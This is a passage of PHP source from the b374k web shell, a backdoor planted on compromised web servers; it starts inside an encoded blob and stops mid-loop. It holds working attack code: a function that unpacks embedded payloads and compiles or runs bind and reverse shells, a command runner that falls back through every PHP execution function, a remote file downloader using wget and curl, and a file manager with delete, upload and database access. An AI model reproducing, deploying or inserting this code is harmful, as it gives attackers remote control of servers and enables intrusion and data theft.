8Nb7dYm4ifB6Gb++B/w9xoSQwSfaHXEcksbhzPOndWoeU/hxSbvjLUtBNhR9AF/6yDdxzpCpi0PO1HI1grtGHNZ7ws1R3wB8jiIesGoDEJpoC8IxJWg2y1Rb+ebeNtBairU755ilrFAp+Uh2WAK7EpBl0WwmgMJmKkn8o1jykPYGpKE8MsiVwZYgFIKPjMjbK3ORz/2p6sx4O+csX+ufVDPqh5896P1y9gFCQS7XO09oz/BT5X2VFEYITsAZUo86ArEgnzwy8sJBQxFQC+kwLKTJwqP3JS5N5ji4nWnxfeWSnDcL+/JJabhsi221j2TzdemGrysC0j1skx6ELXrxPV2tVsAP51uFkv9s9VgTEiFSVKWg7nsP5GRxWrBJZ2m+7en6dhnIep/D2XNRakeXXGdSCWO9dVCY25OsF1YM++HxT9J7g/4tBhE/5cXj9FH0CiMPg1fR3QKujqOpZwOIhxjtVB0CyERzSmpdjVGV4LeOjDmMq+5A9yPw1LHJJrQVq57U8rkZjvhpXyxHu3yeIjMbmZzSuizXH8UrfrWN6022DXsvl0WfrheCu8LIbO4Lj2oFivk7UuLyv8LrYKN+61Kl8OLWatEun9ne/GLRVU3u+P6LDCVQKQb9P2kVeideo0ezQ1kt3HkLOzSPwLsm4crl+usqdTz9DleT3Z2bjcMUgSn90OcdyFuSGhAZBUzo4QToIUBrkhhXXnPeDYOslO5aVswjaulqMBXtjV8Px/sLJgXXnZ/3ReLT1oh1tuoLUEPtPKX00VeHLGV2a1uWMhmWlSCFLXNafQZbMGTq9JcHhsB4O9TCkDqEascfeshdSrTL4S1ReWpWWU7SBwSiwBs0Jtgwry+9jJaxMXP5VrHyvSij1v4OXfIeXRqbgYS5feqQXsQWNaL0gYrfenEEKNpG015uT4SQAJ5vPPPjTg0CMSQwrB2bMjNpJFiEcpE39Pr7uFxEJIO2904/BHHKc+Y+C9vuA+WON2T+I2R+VkyUmPIaQFtEqod5N3BrfNPdzuje//mIj3YeMh9JWa+aQdKIH1g5+l8E/YzWIIcoUyk35fRxxleX+upD5TxHIEoIE3bFCquoba+PjxSDR2E8iW67wCRsYoMosoCJ8/E1BztL6kgk+vvVGQ/zi9wCpOlR3WYpIjXRE6jQzZSNaquus8MU2TzTkxPhJmLkmkc4eYMtvrNKnJz0WtrrEFjq/a3VPT0Yt8SWSBjXfKtetNyZssK8wVKhs9a88W3GgBNSznNivOho+mEJohng786Q+a9mJ044gem7BxBQmTBuMZozd4nvKbuvQta229RV4tJU9Tumwym7r+bycFzyFRPV6HeAX88X2J10igO63XCyAjVafNV3BE/VdlxDe5KR0Biox3uov6q6A24fb8fArM5zMO4sA3GQqw73+OTiSwEkjxalSQlPwlEigqNs9oJf+pvI4jY4qau0R8oJilcRQWjY/rUsvIpsKGnp6P9v6GiXmdYDrb6+TYL8Gt1Io9AgOOygUEg02lwwQwcqmKY9wYWnFQYFNNe0G3n0Wh50qkm6dQu+xkS1fCWb2PXbS9TKQeTOTrp5KwfTuyVbUBHgVOrwT/wU=";
102
103// make link for folder $cwd and all of its parent folder
104function swd($p){
105 global $s_self;
106 $ps = explode(DIRECTORY_SEPARATOR,$p);
107 $pu = "";
108 for($i = 0 ; $i < sizeof($ps)-1 ; $i++){
109 $pz = "";
110 for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR;
111 $pu .= "<a href='".$s_self."cd=".$pz."'>".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>";
112 }
113 return trim($pu);
114}
115// htmlspecialchars, < > "
116function hss($t){
117 $n = array(">","<","\"");
118 $y = array(">", "<", """);
119 return str_replace($n,$y,$t);
120}
121// remove <br />tags
122function rp($t){
123 return trim(str_replace("<br />","",$t));
124}
125// replace spaces with underscore ( _ )
126function cs($t){
127 return str_replace(" ","_",$t);
128}
129// strip slashes,trim and urldecode
130function ss($t){
131 return (!get_magic_quotes_gpc())? trim(urldecode($t)) : trim(urldecode(stripslashes($t)));
132}
133// only strip slashes
134function ssc($t){
135 return (!get_magic_quotes_gpc())? trim($t) : trim(stripslashes($t));
136}
137// bind and reverse shell
138function rs($rstype,$rstarget,$rscode){
139 //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
140 //resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php
141 $result = "";
142 $fpath = "";
143 $fc = gzinflate(base64_decode($rscode));
144
145 $errperm = "Directory ".getcwd().DIRECTORY_SEPARATOR." is not writable, please change to a writable one";
146 $errgcc = "Unable to compile using gcc";
147
148 $split = explode("_",$rstype);
149 $method = $split[0];
150 $lang = $split[1];
151 if($lang=="py" || $lang=="pl" || $lang=="rb"){
152 if($lang=="py") $runlang = "python";
153 elseif($lang=="pl") $runlang = "perl";
154 elseif($lang=="rb") $runlang = "ruby";
155 $fpath = "b374k_rs.".$lang;
156 if(is_file($fpath)) unlink($fpath);
157 if($file=fopen($fpath,"w")){
158 fwrite($file,$fc);
159 fclose($file);
160 if(is_file($fpath)){
161 $result = exe("chmod +x ".$fpath);
162 $result = exe($runlang." ".$fpath." ".$rstarget);
163 }
164 else $result = $errperm;
165 }
166 else $result = $errperm;
167 }
168 elseif($lang=="c"){
169 $fpath = "b374k_rs";
170 if(is_file($fpath)) unlink($fpath);
171 if(is_file($fpath.".c")) unlink($fpath.".c");
172 if($file=fopen($fpath.".c","w")){
173 fwrite($file,$fc);
174 fclose($file);
175 if(is_file($fpath.".c")){
176 $result = exe("gcc ".$fpath.".c -o ".$fpath);
177 if(is_file($fpath)){
178 $result = exe("chmod +x ".$fpath);
179 $result = exe("./".$fpath." ".$rstarget);
180 }
181 else $result = $errgcc;
182 }
183 else $result = $errperm;
184 }
185 else $result = $errperm;
186 }
187 elseif($lang=="win"){
188 $fpath = "b374k_rs.exe";
189 if(is_file($fpath)) unlink($fpath);
190 if($file=fopen($fpath,"w")){
191 fwrite($file,$fc);
192 fclose($file);
193 if(is_file($fpath)){
194 $result = exe($fpath." ".$rstarget);
195 }
196 else $result = $errperm;
197 }
198 else $result = $errperm;
199 }
200 elseif($lang=="php"){
201 $result = eval("?>".$fc);
202 }
203 if(is_file($fpath)) unlink($fpath);
204 if(is_file($fpath.".c")) unlink($fpath.".c");
205 return $result;
206}
207// format bit
208function ts($s){
209 if($s<=0) return 0;
210 $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
211 $e = floor(log($s)/log(1024));
212 return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
213}
214// get file size
215function gs($f){
216 $s = @filesize($f);
217 if($s !== false){
218 if($s<=0) return 0;
219 return ts($s);
220 }
221 else return "???";
222}
223// get file permissions
224function gp($f){
225 if($m=@fileperms($f)){
226 $p = 'u';
227 if(($m & 0xC000) == 0xC000)$p = 's';
228 elseif(($m & 0xA000) == 0xA000)$p = 'l';
229 elseif(($m & 0x8000) == 0x8000)$p = '-';
230 elseif(($m & 0x6000) == 0x6000)$p = 'b';
231 elseif(($m & 0x4000) == 0x4000)$p = 'd';
232 elseif(($m & 0x2000) == 0x2000)$p = 'c';
233 elseif(($m & 0x1000) == 0x1000)$p = 'p';
234 $p .= ($m & 00400) ? 'r' : '-';
235 $p .= ($m & 00200) ? 'w' : '-';
236 $p .= ($m & 00100) ? 'x' : '-';
237 $p .= ($m & 00040) ? 'r' : '-';
238 $p .= ($m & 00020) ? 'w' : '-';
239 $p .= ($m & 00010) ? 'x' : '-';
240 $p .= ($m & 00004) ? 'r' : '-';
241 $p .= ($m & 00002) ? 'w' : '-';
242 $p .= ($m & 00001) ? 'x' : '-';
243 return $p;
244 }
245 else return "???????????";
246}
247// shell command
248function exe($c){
249 $out = "";
250 $c = $c." 2>&1";
251
252 if(is_callable('system')) {
253 ob_start();
254 @system($c);
255 $out = ob_get_contents();
256 ob_end_clean();
257 if(!empty($out)) return $out;
258 }
259 if(is_callable('shell_exec')){
260 $out = @shell_exec($c);
261 if(!empty($out)) return $out;
262 }
263 if(is_callable('exec')) {
264 @exec($c,$r);
265 if(!empty($r)) foreach($r as $s) $out .= $s;
266 if(!empty($out)) return $out;
267 }
268 if(is_callable('passthru')) {
269 ob_start();
270 @passthru($c);
271 $out = ob_get_contents();
272 ob_end_clean();
273 if(!empty($out)) return $out;
274 }
275 if(is_callable('proc_open')) {
276 $descriptorspec = array(
277 0 => array("pipe", "r"),
278 1 => array("pipe", "w"),
279 2 => array("pipe", "w")
280 );
281 $proc = @proc_open($c, $descriptorspec, $pipes, getcwd(), array());
282 if (is_resource($proc)) {
283 while ($si = fgets($pipes[1])) {
284 if(!empty($si)) $out .= $si;
285 }
286 while ($se = fgets($pipes[2])) {
287 if(!empty($se)) $out .= $se;
288 }
289 }
290 @proc_close($proc);
291 if(!empty($out)) return $out;
292 }
293 if(is_callable('popen')){
294 $f = @popen($c, 'r');
295 if($f){
296 while(!feof($f)){
297 $out .= fread($f, 2096);
298 }
299 pclose($f);
300 }
301 if(!empty($out)) return $out;
302 }
303 return "";
304}
305// add slash to the end of given path
306function cp($p){
307 if(is_dir($p)){
308 $x = DIRECTORY_SEPARATOR;
309 while(substr($p,-1) == $x) $p = rtrim($p,$x);
310 return $p.$x;
311 }
312 return $p;
313}
314// delete dir and all of its content (no warning !) xp
315function rmdirs($d){
316 $f = glob($d . '*', GLOB_MARK);
317 foreach($f as $z){
318 if(is_dir($z)) rmdirs($z);
319 else unlink($z);
320 }
321 if(is_dir($d)) rmdir($d);
322}
323// get array of all files from given directory
324function getallfiles($dir){
325 $f = glob($dir . '*');
326 for($i = 0; $i < count($f); $i++){
327 if(is_dir($f[$i])) {
328 $a = glob($f[$i].DIRECTORY_SEPARATOR.'*');
329 $f = array_merge($f, $a);
330 }
331 }
332 return $f;
333}
334// which command
335function xwhich($pr){
336 $p = exe("which $pr");
337 if(trim($p)!="") { return trim($p); } else { return trim($pr); }
338}
339// download file from internet
340function dlfile($u,$p){
341 $n = basename($u);
342
343 // try using php functions
344 if($t = @file_get_contents($u)){
345 if(is_file($p)) unlink($p);;
346 if($f=fopen($p,"w")){
347 fwrite($f,$t);
348 fclose($f);
349 if(is_file($p)) return true;
350 }
351 }
352 // using wget
353 exe(xwhich('wget')." ".$u." -O ".$p);
354 if(is_file($p)) return true;
355
356 // try using lwp-download
357 exe(xwhich('lwp-download')." ".$u." ".$p);
358 if(is_file($p)) return true;
359
360 // try using lynx
361 exe(xwhich('lynx')." -source ".$u." > ".$p);
362 if(is_file($p)) return true;
363
364 // try using curl
365 exe(xwhich('curl')." ".$u." -o ".$p);
366 if(is_file($p)) return true;
367
368 return false;
369}
370// find writable dir
371function get_writabledir(){
372 if(is_writable(".")) $d = ".".DIRECTORY_SEPARATOR;
373 else{
374 if(!$d = getenv("TMP")) if(!$d = getenv("TEMP")) if(!$d = getenv("TMPDIR")){
375 if(is_writable("/tmp")) $d = "/tmp/";
376 else $d = getcwd().DIRECTORY_SEPARATOR;
377 }
378 }
379 return $d;
380}
381// zip function
382function zip($src, $dest){
383 if(!extension_loaded('zip') || !file_exists($src)) return false;
384
385 if(class_exists("ZipArchive")){
386 $zip = new ZipArchive();
387 if(!$zip->open($dest, 1)) return false;
388
389 $src = str_replace('\\', '/', $src);
390 if(is_dir($src)){
391 $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src), 1);
392 foreach($files as $file){
393 $file = str_replace('\\', '/', $file);
394 if(in_array(substr($file, strrpos($file, '/')+1), array('.', '..'))) continue;
395 if (is_dir($file) === true) $zip->addEmptyDir(str_replace($src . '/', '', $file . '/'));
396 else if (is_file($file) === true) $zip->addFromString(str_replace($src . '/', '', $file), @file_get_contents($file));
397 }
398 }
399 elseif(is_file($src) === true) $zip->addFromString(basename($src), @file_get_contents($src));
400 $zip->close();
401 return true;
402 }
403}
404// check shell permission to access program
405function check_access($lang){
406 $s = 0;
407 switch($lang){
408 case "python":
409 $cek = strtolower(exe("python -h"));
410 if(strpos($cek,"usage")!==false) $s = 1;
411 break;
412 case "perl":
413 $cek = strtolower(exe("perl -h"));
414 if(strpos($cek,"usage")!==false) $s = 1;
415 break;
416 case "ruby":
417 $cek = strtolower(exe("ruby -h"));
418 if(strpos($cek,"usage")!==false) $s = 1;
419 break;
420 case "gcc":
421 $cek = strtolower(exe("gcc --help"));
422 if(strpos($cek,"usage")!==false) $s = 1;
423 break;
424 case "tar":
425 $cek = strtolower(exe("tar --help"));
426 if(strpos($cek,"usage")!==false) $s = 1;
427 break;
428 case "java":
429 $cek = strtolower(exe("javac --help"));
430 if(strpos($cek,"usage")!==false){
431 $cek = strtolower(exe("java -h"));
432 if(strpos($cek,"usage")!==false) $s = 1;
433 }
434 break;
435 }
436 return $s;
437}
438// find available archiver
439function get_archiver_available(){
440 global $s_self, $s_tar;
441 $dlfile = "";
442 $avail_arc = array("raw"=>"raw");
443
444 if(class_exists("ZipArchive")){
445 $avail_arc["ziparchive"] = "zip";
446 }
447 if($s_tar){
448 $avail_arc["tar"] = "tar";
449 $avail_arc["targz"] = "tar.gz";
450 }
451
452 $option_arc = "";
453 foreach($avail_arc as $t=>$u){
454 $option_arc .= "<option value=\"".$t."\">".$u."</option>";
455 }
456
457 $dlfile .= "<form action='".$s_self."' method='post'>
458 <select onchange='download(this);' name='dltype' class='inputzbut' style='width:80px;height:20px;'>
459 <option value='' disabled selected>Download</option>
460 ".$option_arc."
461 </select>
462 <input type='hidden' name='dlpath' value='__dlpath__' />
463 </form>
464 ";
465 return $dlfile;
466}
467// explorer, return a table of given dir
468function showdir($cwd){
469 global $s_self;
470
471 $posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
472 $win = (strtolower(substr(php_uname(),0,3)) == "win")? true : false;
473
474 $fname = array();
475 $dname = array();
476
477 if(function_exists("scandir") && $dh = @scandir($cwd)){
478 foreach($dh as $file){
479 if(is_dir($file)) $dname[] = $file;
480 elseif(is_file($file)) $fname[] = $file;
481 }
482 }
483 else{
484 if($dh = @opendir($cwd)){
485 while($file = readdir($dh)){
486 if(is_dir($file)) $dname[] = $file;
487 elseif(is_file($file))$fname[] = $file;
488 }
489 closedir($dh);
490 }
491 }
492
493 sort($fname);
494 sort($dname);
495 $list = array_merge($dname,$fname);
496
497 if($win){
498 //check if this root directory
499 chdir("..");
500 if(cp(getcwd())==cp($cwd)){
501 array_unshift($list, ".");
502 }
503 chdir($cwd);
504 }
505
506 $path = explode(DIRECTORY_SEPARATOR,$cwd);
507 $tree = sizeof($path);
508
509 $parent = "";
510 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
511 else $parent = $cwd;
512
513 $owner_html = (!$win && $posix) ? "<th style='width:120px;'>owner:group</th>" : "";
514 $buff = "
515 <table class='explore sortable'>
516 <tr><th>name</th><th style='width:60px;'>size</th>".$owner_html."<th style='width:70px;'>perms</th><th style='width:110px;'>modified</th><th style='width:180px;' class='sorttable_nosort'>action</th><th style='width:90px;' class='sorttable_nosort'>download</th></tr>
517 ";
518
519 $arc = get_archiver_available();
520 foreach($list as $l){
521 if(!$win && $posix){
522 $name = posix_getpwuid(fileowner($l));
523 $group = posix_getgrgid(filegroup($l));
524 $owner = $name['name']."<span class='gaya'>:</span>".$group['name'];
525 $owner_html = "<td style='text-align:center;'>".$owner."</td>";
526 }
527
528 $lhref = "";
529 $lname = "";
530 $laction = "";
531 if(is_dir($l)){
532 if($l=="."){
533 $lhref = $s_self."cd=".$cwd;
534 $lsize = "LINK";
535 $laction = "
536 <span id='titik1'>
537 <a href='".$s_self."cd=".$cwd."&find=".$cwd."' title='find something'>find</a> |
538 <a href='".$s_self."cd=".$cwd."&upload' title='upload'>upl</a> |
539 <a href='".$s_self."cd=".$cwd."&edit=".$cwd."newfile_1&new' title='create new file'>+file</a> |
540 <a href=\"javascript:tukar('titik1','titik1_form');\" title='create new directory'>+dir</a>
541 </span>
542 <div id='titik1_form' class='sembunyi'>
543 <form action='".$s_self."' method='post'>
544 <input type='hidden' name='cd' value=".$cwd."' />
545 <input class='inputz' id='titik1_' style='width:80px;' type='text' name='mkdir' value='newfolder' />
546 <input class='inputzbut' type='submit' name='rename' style='width:35px;' value='Go !' />
547 </form>
548 <input class='inputzbut' type='button' value='x' onclick=\"tukar('titik1_form','titik1');\" />
549 </div>";
550 }
551 elseif($l==".."){
552 $lhref = $s_self."cd=".$parent;
553 $lsize = "LINK";
554 $laction = "
555 <span id='titik2'>
556 <a href='".$s_self."cd=".$parent."&find=".$parent."' title='find something'>find</a> |
557 <a href='".$s_self."cd=".$parent."&upload' title='upload'>upl</a> |
558 <a href='".$s_self."cd=".$parent."&edit=".$parent."newfile_1&new' title='create new file'>+file</a> |
559 <a href=\"javascript:tukar('titik2','titik2_form');\" title='create new directory'>+dir</a>
560 </span>
561 <div id='titik2_form' class='sembunyi'>
562 <form action='".$s_self."' method='post'>
563 <input type='hidden' name='cd' value='".$parent."' />
564 <input class='inputz' id='titik2_' style='width:80px;' type='text' name='mkdir' value='newfolder' />
565 <input class='inputzbut' type='submit' name='rename' style='width:35px;' value='Go !' />
566 </form>
567 <input class='inputzbut' type='button' value='x' onclick=\"tukar('titik2_form','titik2');\" />
568 </div>";
569 }
570 else{
571 $lhref = $s_self."cd=".$cwd.$l.DIRECTORY_SEPARATOR;
572 $lsize = "DIR";
573 $laction = "
574 <span id='".cs($l)."_link'>
575 <a href='".$s_self."cd=".$cwd.$l.DIRECTORY_SEPARATOR."&find=".$cwd.$l.DIRECTORY_SEPARATOR."' title='find something'>find</a> |
576 <a href='".$s_self."cd=".$cwd.$l.DIRECTORY_SEPARATOR."&upload' title='upload'>upl</a> |
577 <a href=\"javascript:tukar('".cs($l)."_link','".cs($l)."_form');\" title='rename'>ren</a> |
578 <a href='".$s_self."cd=".$cwd."&del=".$l."' title='delete'>del</a>
579 </span>
580 <div id='".cs($l)."_form' class='sembunyi'>
581 <form action='".$s_self."' method='post'>
582 <input type='hidden' name='oldname' value='".$l."' />
583 <input type='hidden' name='cd' value='".$cwd."' />
584 <input class='inputz' style='width:80px;' type='text' id='".cs($l)."_link_' name='newname' value='".$l."' />
585 <input class='inputzbut' type='submit' name='rename' value='ren' />
586 </form>
587 <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($l)."_form','".cs($l)."_link');\" />
588 </div>";
589 }
590 $lname = "[ ".$l." ]";
591 $lsizetit = "0";
592 }
593 else{
594 $lhref = $s_self."view=".$l;
595 $lname = $l;
596 $lsize = gs($l);
597 $lsizetit = @filesize($l);
598 $laction = "
599 <div id='".cs($l)."_form' class='sembunyi'>
600 <form action='".$s_self."' method='post'>
601 <input type='hidden' name='oldname' value='".$l."' />
602 <input class='inputz' style='width:80px;' type='text' id='".cs($l)."_link_' name='newname' value='".$l."' />
603 <input class='inputzbut' type='submit' name='rename' value='ren' />
604 </form>
605 <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($l)."_form','".cs($l)."_link');\" />
606 </div>
607 <span id='".cs($l)."_link'>
608 <a href='".$s_self."edit=".cs($cwd.$l)."' title='edit'>edit</a> |
609 <a href='".$s_self."hexedit=".cs($cwd.$l)."' title='edit as hex'>hex</a> |
610 <a href=\"javascript:tukar('".cs($l)."_link','".cs($l)."_form');\" title='rename'>ren</a> |
611 <a href='".$s_self."del=".$l."' title='delete'>del</a>
612 </span>";
613 }
614
615 $ldl = str_replace("__dlpath__",$l,$arc);
616 $buff .= "
617 <tr>
618 <td class='explorelist' onmouseup=\"return go('".addslashes($lhref)."',event);\">
619 <a href='".$lhref."'>".$lname."</a>
620 </td>
621 <td title='".$lsizetit."'>".$lsize."</td>
622 ".$owner_html."
623 <td style='text-align:center;'>".gp($l)."</td>
624 <td style='text-align:center;'>".@date("d-M-Y H:i",filemtime($l))."</td>
625 <td>".$laction."</td>
626 <td>".$ldl."</td></tr>";
627 }
628 $buff .= "</table>";
629 return $buff;
630}
631//database related functions
632function sql_connect($sqltype, $sqlhost, $sqluser, $sqlpass){
633 if($sqltype == 'mysql'){if(function_exists('mysql_connect')) return @mysql_connect($sqlhost,$sqluser,$sqlpass);}
634 elseif($sqltype == 'mssql'){
635 if(function_exists('mssql_connect')) return @mssql_connect($sqlhost,$sqluser,$sqlpass);
636 elseif(function_exists('sqlsrv_connect')){
637 $coninfo = array("UID"=>$sqluser, "PWD"=>$sqlpass);
638 return @sqlsrv_connect($sqlhost,$coninfo);
639 }
640 }
641 elseif($sqltype == 'pgsql'){
642 $hosts = explode(":", $sqlhost);
643 if(count($hosts)==2){
644 $host_str = "host=".$hosts[0]." port=".$hosts[1];
645 }
646 else $host_str = "host=".$sqlhost;
647 if(function_exists('pg_connect')) return @pg_connect("$host_str user=$sqluser password=$sqlpass");
648 }
649 elseif($sqltype == 'oracle'){if(function_exists('oci_connect')) return @oci_connect($sqluser,$sqlpass,$sqlhost);}
650 elseif($sqltype == 'sqlite3'){
651 if(class_exists('SQLite3')) if(!empty($sqlhost)) return new SQLite3($sqlhost);
652 else return false;
653 }
654 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_open')) return @sqlite_open($sqlhost);}
655 elseif($sqltype == 'odbc'){if(function_exists('odbc_connect')) return @odbc_connect($sqlhost,$sqluser,$sqlpass);}
656 elseif($sqltype == 'pdo'){
657 if(class_exists('PDO')) if(!empty($sqlhost)) return new PDO($sqlhost,$sqluser,$sqlpass);
658 else return false;
659 }
660}
661function sql_query($sqltype, $query, $con){
662 if($sqltype == 'mysql'){if(function_exists('mysql_query')) return mysql_query($query);}
663 elseif($sqltype == 'mssql'){
664 if(function_exists('mssql_query')) return mssql_query($query);
665 elseif(function_exists('sqlsrv_query')) return sqlsrv_query($con,$query);
666 }
667 elseif($sqltype == 'pgsql'){if(function_exists('pg_query')) return pg_query($query);}
668 elseif($sqltype == 'oracle'){
669 if(function_exists('oci_parse') && function_exists('oci_execute')){
670 $st = oci_parse($con, $query);
671 oci_execute($st);
672 return $st;
673 }
674 }
675 elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $con->query($query);}
676 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_query')) return sqlite_query($con, $query);}
677 elseif($sqltype == 'odbc'){if(function_exists('odbc_exec')) return odbc_exec($con, $query);}
678 elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $con->query($query);}
679}
680function sql_num_fields($sqltype, $hasil){
681 if($sqltype == 'mysql'){if(function_exists('mysql_num_fields')) return mysql_num_fields($hasil);}
682 elseif($sqltype == 'mssql'){
683 if(function_exists('mssql_num_fields')) return mssql_num_fields($hasil);
684 elseif(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($hasil);
685 }
686 elseif($sqltype == 'pgsql'){if(function_exists('pg_num_fields')) return pg_num_fields($hasil);}
687 elseif($sqltype == 'oracle'){if(function_exists('oci_num_fields')) return oci_num_fields($hasil);}
688 elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $hasil->numColumns();}
689 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_num_fields')) return sqlite_num_fields($hasil);}
690 elseif($sqltype == 'odbc'){if(function_exists('odbc_num_fields')) return odbc_num_fields($hasil);}
691 elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $hasil->columnCount();}
692}
693function sql_field_name($sqltype,$hasil,$i){
694 if($sqltype == 'mysql'){if(function_exists('mysql_field_name')) return mysql_field_name($hasil,$i);}
695 elseif($sqltype == 'mssql'){
696 if(function_exists('mssql_field_name')) return mssql_field_name($hasil,$i);
697 elseif(function_exists('sqlsrv_field_metadata')){
698 $metadata = sqlsrv_field_metadata($hasil);
699 if(is_array($metadata)){
700 $metadata=$metadata[$i];
701 }
702 if(is_array($metadata)) return $metadata['Name'];
703 }
704 }
705 elseif($sqltype == 'pgsql'){if(function_exists('pg_field_name')) return pg_field_name($hasil,$i);}
706 elseif($sqltype == 'oracle'){if(function_exists('oci_field_name')) return oci_field_name($hasil,$i+1);}
707 elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $hasil->columnName($i);}
708 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_field_name')) return sqlite_field_name($hasil,$i);}
709 elseif($sqltype == 'odbc'){if(function_exists('odbc_field_name')) return odbc_field_name($hasil,$i+1);}
710 elseif($sqltype == 'pdo'){
711 if(class_exists('PDO')){
712 $res = $hasil->getColumnMeta($i);
713 return $res['name'];
714 }
715 }
716}
717function sql_fetch_data($sqltype,$hasil){
718 if($sqltype == 'mysql'){if(function_exists('mysql_fetch_row')) return mysql_fetch_row($hasil);}
719 elseif($sqltype == 'mssql'){
720 if(function_exists('mssql_fetch_row')) return mssql_fetch_row($hasil);
721 elseif(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($hasil,1);
722 }
723 elseif($sqltype == 'pgsql'){if(function_exists('pg_fetch_row')) return pg_fetch_row($hasil);}
724 elseif($sqltype == 'oracle'){if(function_exists('oci_fetch_row')) return oci_fetch_row($hasil);}
725 elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $hasil->fetchArray(1);}
726 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_fetch_array')) return sqlite_fetch_array($hasil,1);}
727 elseif($sqltype == 'odbc'){if(function_exists('odbc_fetch_array')) return odbc_fetch_array($hasil);}
728 elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $hasil->fetch(2);}
729}
730function sql_num_rows($sqltype,$hasil){
731 if($sqltype == 'mysql'){if(function_exists('mysql_num_rows')) return mysql_num_rows($hasil);}
732 elseif($sqltype == 'mssql'){
733 if(function_exists('mssql_num_rows')) return mssql_num_rows($hasil);
734 elseif(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($hasil);
735 }
736 elseif($sqltype == 'pgsql'){if(function_exists('pg_num_rows')) return pg_num_rows($hasil);}
737 elseif($sqltype == 'oracle'){if(function_exists('oci_num_rows')) return oci_num_rows($hasil);}
738 elseif($sqltype == 'sqlite3'){
739 if(class_exists('SQLite3')){
740 $metadata = $hasil->fetchArray();
741 if(is_array($metadata)) return $metadata['count'];
742 }
743 }
744 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_num_rows')) return sqlite_num_rows($hasil);}
745 elseif($sqltype == 'odbc'){if(function_exists('odbc_num_rows')) return odbc_num_rows($hasil);}
746 elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $hasil->rowCount();}
747}
748function sql_close($sqltype,$con){
749 if($sqltype == 'mysql'){if(function_exists('mysql_close')) return mysql_close($con);}
750 elseif($sqltype == 'mssql'){
751 if(function_exists('mssql_close')) return mssql_close($con);
752 elseif(function_exists('sqlsrv_close')) return sqlsrv_close($con);
753 }
754 elseif($sqltype == 'pgsql'){if(function_exists('pg_close')) return pg_close($con);}
755 elseif($sqltype == 'oracle'){if(function_exists('oci_close')) return oci_close($con);}
756 elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $con->close();}
757 elseif($sqltype == 'sqlite'){if(function_exists('sqlite_close')) return sqlite_close($con);}
758 elseif($sqltype == 'odbc'){if(function_exists('odbc_close')) return odbc_close($con);}
759 elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $con = null;}
760}
761if(!function_exists('str_split')){
762 function str_split($t,$s=1){
763 $a = array();
764 for($i=0;$i<strlen($t);){
765 $a[] = substr($t,$i,$s);
766 $i += $s;
767 }
768 return $a;
769 }
770}
771
772// favicon
773if(isset($_REQUEST['favicon'])){
774 $data = gzinflate(base64_decode($favicon));
775 header("Content-type: image/png");
776 header("Cache-control: public");
777 echo $data;
778 exit;
779}
780
781global $s_self;
782$s_self = "?";
783
784$cek1 = basename($_SERVER['SCRIPT_FILENAME']);
785$cek2 = substr(basename(__FILE__),0,strlen($cek1));;
786
787if(isset($_COOKIE['b374k_included'])){
788 if(strcmp($cek1,$cek2)!=0) $s_self = $_COOKIE['s_self'];
789 else{
790 $s_self = "?";
791 setcookie("b374k_included", "0" ,time() - $s_login_time);
792 setcookie("s_self", $s_self ,time() + $s_login_time);
793 }
794}
795else{
796 if(strcmp($cek1,$cek2)!=0){
797 if(!isset($_COOKIE['s_home'])){
798 $s_home = "?".$_SERVER["QUERY_STRING"]."&";
799 setcookie("s_home", $s_home ,time() + $s_login_time);
800 }
801 if(isset($s_home)) $s_self = $s_home;
802 elseif(isset($_COOKIE['s_home'])) $s_self = $_COOKIE['s_home'];
803 setcookie("b374k_included", "1" ,time() + $s_login_time);
804 setcookie("s_self", $s_self ,time() + $s_login_time);
805 }
806 else{
807 $s_self = "?";
808 setcookie("b374k_included", "0" ,time() - $s_login_time);
809 setcookie("s_self", $s_self ,time() + $s_login_time);
810 }
811}
812
813if($s_auth){
814 // server software
815 $s_software = getenv("SERVER_SOFTWARE");
816 // uname -a
817 $s_system = php_uname();
818 // check os
819 $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
820 // change working directory
821 if(isset($_REQUEST['cd'])){
822 $dd = ss($_REQUEST['cd']);
823 if(is_dir($dd)){
824 $cwd = cp($dd);
825 chdir($cwd);
826 setcookie("cwd", $cwd ,time() + $s_login_time);
827 }
828 }
829 else{
830 if(isset($_COOKIE['cwd'])){
831 $dd = ss($_COOKIE['cwd']);
832 if(is_dir($dd)){
833 $cwd = cp($dd);
834 chdir($cwd);
835 }
836 }
837 else $cwd = cp(getcwd());
838 }
839 // get path and all drives available
840 $letters = '';
841 if(!$s_win){
842 if(!$s_user = rp(exe("whoami"))) $s_user = "";
843 if(!$s_id = rp(exe("id"))) $s_id = "";
844 }
845 else {
846 $s_user = get_current_user();
847 $s_id = $s_user;
848 // find drive letters
849 $v = explode("\\",$cwd);
850 $v = $v[0];
851 foreach (range("A","Z") as $letter){
852 if(is_dir($letter.":\\") && is_readable($letter.":\\")){
